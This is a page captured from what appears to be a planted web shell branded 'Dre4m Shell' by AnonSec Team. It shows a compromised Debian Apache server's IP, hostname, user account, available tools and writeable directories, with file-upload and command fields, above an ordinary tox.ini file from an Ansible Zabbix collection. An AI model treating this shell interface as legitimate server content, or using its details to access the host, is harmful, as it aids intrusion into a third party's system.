Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 216.73.216.122
Web Server : Apache/2.4.65 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 8.2.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/ansible_collections/community/zabbix/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python3/dist-packages/ansible_collections/community/zabbix/tox.ini
[tox]
minversion = 1.4.2
envlist = linters
skipsdist = True

[testenv]
#deps = -r{toxinidir}/requirements.txt
#       -r{toxinidir}/test-requirements.txt

[testenv:venv]
# This env is used to push new release on Galaxy
install_command = pip install {opts} {packages}
deps = ansible
commands = {posargs}

[testenv:linters-py2]
install_command = pip install {opts} {packages}
deps =
  flake8
commands =
  flake8 plugins {posargs}

[testenv:linters-py3]
install_command = pip install {opts} {packages}
deps =
  flake8
  antsibull-changelog
commands =
  flake8 plugins {posargs}
  antsibull-changelog lint

[flake8]
per-file-ignores =
  plugins/module_utils/version.py: F401

show-source = True
ignore = E123,E125,E402,E501,E741,W503
max-line-length = 160
builtins = _
exclude = .git,.tox,tests/unit/compat/

Anon7 - 2022
AnonSec Team